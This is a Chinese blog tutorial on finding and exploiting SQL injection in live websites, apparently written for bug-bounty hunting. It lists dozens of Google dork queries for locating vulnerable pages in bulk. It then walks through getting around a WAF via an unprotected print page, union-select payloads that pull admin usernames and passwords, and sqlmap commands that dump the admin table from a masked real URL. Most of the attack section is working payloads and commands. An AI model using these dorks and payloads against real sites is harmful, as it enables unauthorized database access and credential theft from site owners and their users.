当前位置:首页 > web渗透 > sql注入 > 正文内容

实战|SQL漏洞实战挖掘技巧

3个月前 (02-16)250

信息收集

这里先给大家推荐几个谷歌hack语法用来批量挖掘sql漏洞的。

inurl:/search_results.php search=

inurl:’Product.asp?BigClassName

inurl:Article_Print.asp?

inurl:NewsInfo.asp?id=

inurl:EnCompHonorBig.asp?id=

inurl:NewsInfo.asp?id=

inurl:ManageLogin.asp

inurl:Offer.php?idf=

inurl:Opinions.php?id=

inurl:Page.php?id=

inurl:Pop.php?id=

inurl:Post.php?id=

inurl:Prod_info.php?id=

inurl:Product-item.php?id=

inurl:Product.php?id=

inurl:Product_ranges_view.php?ID=

inurl:Productdetail.php?id=

inurl:Productinfo.php?id=

inurl:Produit.php?id=

inurl:Profile_view.php?id=

inurl:Publications.php?id=

inurl:Stray-Questions-View.php?num=

inurl:aboutbook.php?id=

inurl:ages.php?id=

inurl:announce.php?id=

inurl:art.php?idm=

inurl:article.php?ID=

inurl:asp?id=

inurl:avd_start.php?avd=

inurl:band_info.php?id=

inurl:buy.php?category=

inurl:category.php?id=

inurl:channel_id=

inurl:chappies.php?id=

inurl:clanek.php4?id=

inurl:clubpage.php?id=

inurl:collectionitem.php?id=

inurl:communique_detail.php?id=

inurl:curriculum.php?id=

inurl:declaration_more.php?decl_id=

inurl:detail.php?ID=

inurl:download.php?id=

inurl:downloads_info.php?id=

inurl:event.php?id=

inurl:faq2.php?id=

inurl:fellows.php?id=

inurl:fiche_spectacle.php?id=

inurl:forum_bds.php?num=

inurl:galeri_info.php?l=

inurl:gallery.php?id=

inurl:game.php?id=

inurl:games.php?id=

inurl:historialeer.php?num=

inurl:hosting_info.php?id=

inurl:humor.php?id=

挖掘

当我们满怀信息的去挖掘漏洞时你会发现我的天有waf,不挖了太难了...


首先我们不要有这样的想法,我们要想我们能挖到!!!


好了回归正题!!


当你发现网站有waf怎么绕都绕不过去不要急,教你骚操作好好看好好学,既然网站有waf,我们也绕不过去,那我们就找网站没有waf的地方。

1.png

你看看这地方注意这四个字“打印此文”没错这里没有waf没有保护

and 1=2 没有返回信息说明为假,

2.webpand 1=1返回了数据说明为真不错

3.webp猜字段order by 29没有返回信息

4.webporder by 28返回了信息也就是说字段在1-28

5.webp

然后我们猜想一下有个表是admin表,union select 1,2,3,4,5,6,7,4,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin 数据库没有出错说明数据库当中的确有admin表的存在并且,


发现注入点在3,4,5,14


然后我们尝试猜测最常见的管理表字段名username和password,


我们在3,4,5,14中任选两个,分别填入username和password 

6.webpunion select 1,2,username,4,password,6,7,4,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin 可以看出页面已经返回了admin表中的username和password的字段内容

7.webp

不错不错

再给各位演示一下用sqlmap

首先sqlmap是自带脚本的,可以绕waf的这些脚本都在tamper文件夹中,详细就不讲了大家可以上网搜搜~

sqlmap.py -u www.xxxx.com/Article_Print.asp?ArticleID=1182 —level 3 (level是等级最高是5级)

8.webp

sqlmap.py -u http://www.xxxx.com/Article_Print.asp?ArticleID=1182 —dbs


咦!这是怎么回事,怎么跑不出来数据库库名算了放弃,没错这就是我当初第一次使用sqlmap的状态,明明跑出了漏洞但数据库库名跑不出嘤嘤


当你仔细看你就会发现sqlmap给你提示了。。。。。。。


好家伙瞬间想到一句话爷只是怕错过。。。。。。

9.webp

好家伙我直接泪奔。。

sqlmap.py -u http://www.xxxx.com/Article_Print.asp?ArticleID=1182 —tables

10.webp

看看看看跑出来了

sqlmap.py -u http://www.xxxx.com/Article_Print.asp?ArticleID=1182 -T admin —columns获取admin表里的字段(-T 是tables简写)

11.webpsqlmap.py -u http://www.xxxx.com/Article_Print.asp?ArticleID=1182 -T admin -C username,password —dump获取admin表里的username和password字段内容(-T是tables简写 -C是columns简写)

12.webp

哇哦是不是很nice点赞!!


最后说一下当你的漏洞被忽略的时候一定要看他给的原因


当你的忽略原因和我一样是无法复现时

13.webp14.webp

一定要自己在复现一次看看是不是真的不能复现如果能那就申诉(毕竟被扣了27积分呜呜)

15.webp

好在最后申诉成功了,要不然我的27积分就白白没了...

扫描二维码推送至手机访问。

版权声明:本文由零零博客发布,如需转载请注明出处。

分享给朋友:
返回列表

上一篇:常见的盲注环境

没有最新的文章了...

相关文章

怎么判断数据库类型

怎么判断数据库类型

想要成功的发动SQL注入攻击,最重要的是知道应用正在使用的数据库类型和版本。没有这一信息就不可能向查询注入信息并提取自己所感兴趣的数据,正所谓知己知彼百战百胜。一:常见构架判断数据库类型asp&nbs...

什么是SQL盲注

什么是SQL盲注

盲注是指在无法使用详细数据库错消息或带内数据连接的情况下,利用数据库查询的输入审查漏洞从数据库提取信息或提取与数据库查询相关信息的攻击技术如果设计出了完整的查询(包括所有的相关的列及类型) ,带内数据...

sql注入简单测试

sql注入简单测试

最简单的测试http://localhost/test.php?id=15’ 返回错误http://localhost/test.php?id=15 and 1=1 返回...

常见的盲注环境

常见的盲注环境

提交一个导致SQL查询无效的利用是会返回一个通用错误页面,而提交正确的SQL时则返回一个内容可被适度控制的页面提交一个导致SQL查询无效的利用时会返回一个通用的错误页面,而提交正确的SQL时则会返回-...

sql注入是什么

sql注入是什么

sql注入是一种将sql代码插入或添加到应用的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行。凡是构造SQL语句的步骤均存在被潜在攻击的风险,因为sql的多样性和构造时使用的...